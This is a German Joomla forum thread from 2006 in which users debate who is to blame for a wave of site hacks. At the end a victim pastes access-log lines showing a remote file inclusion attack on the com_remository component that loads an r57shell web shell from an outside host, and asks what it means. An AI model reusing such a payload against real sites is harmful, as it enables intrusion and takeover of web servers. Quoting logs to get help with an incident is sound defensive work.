Thema: Seiten gehackt

Zitat von ajuch

Das mit der config.php ist IMO nur eine zusätzliche Sicherheitsmaßnahme. Meiner Ansicht nach sollten die Skripte soweit geschützt sein (Input Validation, etc.), dass der Angreifer nicht automatisch alles Ändern kann was er will. Das ist für mich so wie wenn ich die Haustüre nicht absperre, aber den Geldbeutel anbinde.

Richtig. Die meisten der hier in letzter Zeit aufgetauchten Hacks konnten aber nur aufgrund einer Kombination verschiedener Lücken bzw. falscher Einstellungen erfolgreich sein.

Zitat von ajuch

Das mit der OSS ist für mich auch ein ganz verständlicher Punkt. Als begeisterter Linux und Open Source Anwender bin ich es aber gewöhnt, dass experimentelle Software als Alpha bzw. Beta gekennzeichnet wird und nicht als stable verkauft wird. Das scheint hier etwas falsch zu laufen.

Ein Punkt, dem ich zustimmen kann. Wurde ja auch schon in anderen threads angesprochen, dass eine Art Zertifizierungsstelle durchaus sehr hilfreich wäre, auch wenn selbst dies nicht absolute Sicherheitsgarantie geben kann.

Zitat von ajuch

Und das hier prinzipiell der Anwender zuerst mal als dumm hingestellt wird, finde ich so auch nicht ok.

Dies war auch nicht im Mindesten meine Absicht. Meine Frage ("Oder irgendein neues Sicherheitsloch entdeckt?") war ernst gemeint. Leider habe ich darauf ja keine Antwort bekommen.
Allerdings darf man schon auch nach der Verantwortung der User fragen. Nur zu fordern, die Entwickler sollen endlich mal sicher Software programmieren, ist eben etwas zu einfach. Natürlich sollen sie das, aber für einen Teil der Hacks sind die User nunmal mitverantwortlich. Man braucht sich ja nur mal die täglichen posts zu den Hacks durchzulesen.
Als dumm würde ich keinen Anwender (bin ja auch einer) hinstellen, wohl aber mitunter als fahrlässig.

Gruß Papi

Zitat von langsch2

Zeig mir mal die Stelle wo im Posting von Webmasterin nur "Frust abgelassen wurde".
Eher im Gegenteil. Viel sachlicher geht es schon fast nicht mehr.

Dann haben wir eine unterschiedliche Wahrnehmung.

Zitat von webmaster

Ich hab so langsam keine Lust mehr auf diese Art von Spielchen.

Zitat von webmaster

Ich kann nicht einfach so etwas erstellen, dass so löchrig ist wie ein Schweizer Käse!!!
Und mich dann nicht mehr drum kümmern.
So gehts nicht.

Wenn jemand fast nur Kritik übt, und dies - in meinen Augen - wenig konstruktiv tut, so empfinde ich das als Frust ablassen.

Um wieder etwas zum Thema zurückzukommen:
Einen guten Ansatz der Joomla-Entwickler auf die Sicherheitslöcher in den Dritt-Anbieter-Komponenten gibt es hier:
http://dev.joomla.org/component/opti...s:make_secure/

Gruß Papi

Zitat von langsch2

Das kommt imer darauf an *welche* Stellen man zitiert und welche man weglässt :-)

Ok, ich geb's zu! Aber schließlich hast Du mich ja auch nach einer Stelle gefragt.

Zitat von langsch2

Zum Thema Sicherhet zurück. Mir ist in den letzten Tagen eine zugegebenermassen etwas "abstruse" Idee gekommen: Phalanger - Mono oder -.NET Kombination.

Wem das jetzt nichts sagt: http://www.heise.de/newsticker/resul...ords=Phalanger

Wäre das ein Weg den man ernsthaft in Erwägung ziehen könnte?

Da kenne ich mich nicht mit aus. Aber wo bliebe der Open Source-Gedanke, wenn man nur noch die binaries herausgibt, oder blicke ich es gerade nicht?

Gruß Papi

Zitat von ajuch

Das Problem liegt meiner Meinung nach an einer teils schlecht durchdachten, schlecht dokumentierten und nicht sauber implementierten API. Die Entwickler von Komponenten müssen einfach ein Framework zur verfügung haben das ihre Komponenten automatisch gegen grobe Schnitzer absichert UND ihnen die Entwicklung erleichtert. Dieses Framework muss auch gut dokumentiert sein.
Möglicherweise ist die 1.5er Version ja auch so toll wie wir es uns alle erhoffen, aber wenn sie auf der aktuellen Version aufbaut, bin ich ehrlich gesagt pessimistisch.

Ein paar Ansätze sind in der 1.5 schon zu erkennen.
Dass wir uns nicht falsch verstehen: Da gibt es von Seiten der Joomla-Entwickler sicher noch einiges zu tun. Mir geht es nur darum, dass jeder sein Bestes geben soll. Und dazu gehört auch der Entwickler von Komponenten und der Anwender. Nur zu fordern, die anderen sollen, ist mir zu einfach.

Zitat von ajuch

Momentan sind solche strukturellen Änderungen aber fast unmöglich, da mit einem Schlag alle Komponenten angepasst werden müssten. Langfristig (Version 1.5) sollte das IMO aber auf jeden Fall passieren.

Da hat man leider auch dem Druck der Anwender nachgegeben.

Dass in der letzten Zeit so viele joomla Seiten betroffen sind, kann vielleicht auch damit zu tun haben, dass eine zentrale Hack Datenbank kürzlich auf joomla umgestiegen ist.

Mir wurde mal meine 4images Galerie gehackt und ich hatte dann im Internet nach der Hackergruppe etwas recherchiert und dabei war ich auf www.zone-h.org gestoßen.

Dort scheint über alle Hackerangriffe im Internet genau Buch geführt zu werden und es werden dort stolz alle gehackten Webseiten gelistet incl. einer Hacker Top List usw.

Diese Seite läuft jetzt auf joomla (vorher wars irgendwas anderes). Die haben sogar eine eigene Komponente com_attacks entwickelt.
http://www.zone-h.org/component/opti...cks/Itemid,43/

Wenn man oben auf 'enable filters' klickt kann man nach attacker, webseite, Datum etc. etc. suchen.

Da haben die natürlich die joomla software genau unter die Lupe genommen nehme ich an ...

Nachtrag: wenn man es genau nimmt, könnte man es dann aber direkt schon als ein Kompliment werten, wenn sich die Hacker dann doch selber für joomla entscheiden ...

morgen,

auch meine Seite wurde gehackt und ich habe folgendes aus dem ftp log auslesen können:

81.214.181.200 - - [12/Aug/2006:16:42:09 +0200] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://rst.void****/download/r57shell.txt? HTTP/1.1" 200 36857 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
81.214.181.200 - - [12/Aug/2006:16:42:17 +0200] "POST /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://rst.void****/download/r57shell.txt? HTTP/1.1" 200 8842 "http://www.****/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://rst.void****/download/r57shell.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
81.214.181.200 - - [12/Aug/2006:16:42:27 +0200] "POST /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://rst.void****/download/r57shell.txt? HTTP/1.1" 200 36757 "http://www.****/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://rst.void****/download/r57shell.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

Könnte mir jemand eine Info dazu bitte geben?
Grüße
killa